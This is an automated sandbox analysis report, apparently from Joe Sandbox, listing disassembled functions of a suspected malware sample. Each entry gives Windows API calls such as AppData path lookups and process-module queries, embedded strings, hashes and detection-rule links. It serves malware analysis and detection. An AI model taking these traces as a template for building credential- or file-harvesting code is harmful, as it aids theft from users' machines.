                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 6c00d805cc6169a6697abf4bb1f9f92f9376fe640c8416b0ccfecd51bf6726f3
                            • Instruction ID: 8003766c8a68f5bc943c5693a8fe6987e810e268a55e27c3484f433ad3d55863
                            • Opcode Fuzzy Hash: 6c00d805cc6169a6697abf4bb1f9f92f9376fe640c8416b0ccfecd51bf6726f3
                            • Instruction Fuzzy Hash: F7113C31304B41CBD721BF2CF800B1AB7E5AB92761F250A9AE0D187699D761D845CBB5
                            Function 00D83CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00D8A430,000000FF), ref: 00D83D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D83D27
                            • wsprintfA.USER32 ref: 00D83D37
                              • Part of subcall function 00D871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00D871FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: dfc1432237d392233f5bd69fb32dcf6dd1f8170b24824f7d20027feb96d89714
                            • Instruction ID: 184f49e1ae1c8d13dbbe332b5ae02aa08b2176dea94fa772be6828dbf39578fc
                            • Opcode Fuzzy Hash: dfc1432237d392233f5bd69fb32dcf6dd1f8170b24824f7d20027feb96d89714
                            • Instruction Fuzzy Hash: 1F01C471648308BFE7105B69DC0AF6A7B68FB46B61F10011AFA15972E0C7F51900CBB1
                            Function 00D68710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D68737
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A188
                              • Part of subcall function 00D8A173: std::exception::exception.LIBCMT ref: 00D8A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: ca84334a0bd3e8a78e4c7fdb25ca725d84aa56d940480fae2a4e1f7547eae674
                            • Instruction ID: 4e594c0fc2460dc9b4311472f5926cfa709fbd94c7068bfdf622652b5dee4f55
                            • Opcode Fuzzy Hash: ca84334a0bd3e8a78e4c7fdb25ca725d84aa56d940480fae2a4e1f7547eae674
                            • Instruction Fuzzy Hash: F1F0B437F400310F8354643D9D8445EA94796E539033ED765E85AEF359DC70EC82A6F5
                            Function 00D7E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7E544
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E573
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7E581
                            • lstrcat.KERNEL32(?,00BFDA80), ref: 00D7E59C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 20698046169e449a9e6c53c38d003a80078f6fefff3213d3ede451b700c177e5
                            • Instruction ID: 3212bec2375bb338df63427bd3ed11440ec721a16d81838b50e02afca172e748
                            • Opcode Fuzzy Hash: 20698046169e449a9e6c53c38d003a80078f6fefff3213d3ede451b700c177e5
                            • Instruction Fuzzy Hash: 3D518275A5010CAFD755EB64DC42EFE3379FB88340F18449ABA1A97241EA70AE458BB0
                            Function 00D81FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00D81FDF, 00D81FF5, 00D820B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: 8b683511eebeb918cc60e7a640c81a67011a8a813452352c9843c5aaa1cbe26e
                            • Instruction ID: cdd2a612216ea3044a84481ff5ae56d0423ecbb9b0e3af8b083ad995ba3b6a5d
                            • Opcode Fuzzy Hash: 8b683511eebeb918cc60e7a640c81a67011a8a813452352c9843c5aaa1cbe26e
                            • Instruction Fuzzy Hash: 7F210A3551028A9FDB20FE35C4456FDF7A6EF80361F884056C8594B282E336590AD7B6
                            Function 00D7EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7EBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 00D7EBF1
                            • lstrcat.KERNEL32(?,00BFE2B8), ref: 00D7EC0C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: f5c83a85b576383f1840328d4b331e93c3ac336ee5f646a7ac77b417ff021e2f
                            • Instruction ID: b30454e63a807b7b089b40a99a4c2e92aaed85857828bfa5c7efcd43d7f79e16
                            • Opcode Fuzzy Hash: f5c83a85b576383f1840328d4b331e93c3ac336ee5f646a7ac77b417ff021e2f
                            • Instruction Fuzzy Hash: 9F31A471A5111CABCB25EFA8DC52BED77B4EF48300F1444A9BA1AD7250DE70AE448BB0
                            Function 00D84480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 00D84492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00D844AD
                            • CloseHandle.KERNEL32(00000000), ref: 00D844B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D844E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: 225054a7bf4274f2d31daa8162b7f175930dc17f7465f57f272a366a41a6b7d6
                            • Instruction ID: bc12bf6492db0f353ac4696efc68d330b5ebcc79ac5c3184fb7b0d1bac948dfa
                            • Opcode Fuzzy Hash: 225054a7bf4274f2d31daa8162b7f175930dc17f7465f57f272a366a41a6b7d6
                            • Instruction Fuzzy Hash: F9F0FCB090161A2BE720AB789C4DBE6B7A8EF14304F040595FA45D7180EBF08D808BA0
                            Function 00D88FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 00D88FDD
                              • Part of subcall function 00D887FF: __amsg_exit.LIBCMT ref: 00D8880F
                            • __getptd.LIBCMT ref: 00D88FF4
                            • __amsg_exit.LIBCMT ref: 00D89002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00D89026
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 8f5f0e86677490197139a1e44b53174334778574f812cc931e834e06c1264719
                            • Instruction ID: 109aed43e6b24125e71e4e8bfb3dc28f84b9b35c511b68587be1d01849946778
                            • Opcode Fuzzy Hash: 8f5f0e86677490197139a1e44b53174334778574f812cc931e834e06c1264719
                            • Instruction Fuzzy Hash: D6F09032948710DBDB61BB789806B6D73B0EF00720F794209F484AA2D2DF649940EBB9
                            Function 00D87310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(------,00D65BEB), ref: 00D8731B
                            • lstrcpy.KERNEL32(00000000), ref: 00D8733F
                            • lstrcat.KERNEL32(?,------), ref: 00D87349
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: b05c61b27685828d6b91b87e17e263c17e17765879d277f1f0e1c7712db4a63a
                            • Instruction ID: 1eb0148aaf20560d56fe30445f5d78674afbf550b9ee534022dff4317e0d5f55
                            • Opcode Fuzzy Hash: b05c61b27685828d6b91b87e17e263c17e17765879d277f1f0e1c7712db4a63a
                            • Instruction Fuzzy Hash: C9F0E5746157029FDB64AF35D848927B7F9EF9570132C881EACEAC7214E730D841DB20
                            Function 00D733D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73422
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73471
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73497
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: da01d14d33082899c4a93605007bacb0fc37414a0a587ac524d13deeab6b6a54
                            • Instruction ID: e9ed7c9ff1ffd1f9474d58d7eed9a95ef252303c71a1da7c2484f725a7c4e3fa
                            • Opcode Fuzzy Hash: da01d14d33082899c4a93605007bacb0fc37414a0a587ac524d13deeab6b6a54
                            • Instruction Fuzzy Hash: 0212E970A012158FDB28CF19C554B25B7E5BF48718B2DC0AEE80D9B3A2E772DD82DB54
                            Function 00D77C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 00D77CAF
                              • Part of subcall function 00D77D40: std::_Xinvalid_argument.LIBCPMT ref: 00D77D58
                              • Part of subcall function 00D77D40: std::_Xinvalid_argument.LIBCPMT ref: 00D77D76
                              • Part of subcall function 00D77D40: std::_Xinvalid_argument.LIBCPMT ref: 00D77D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
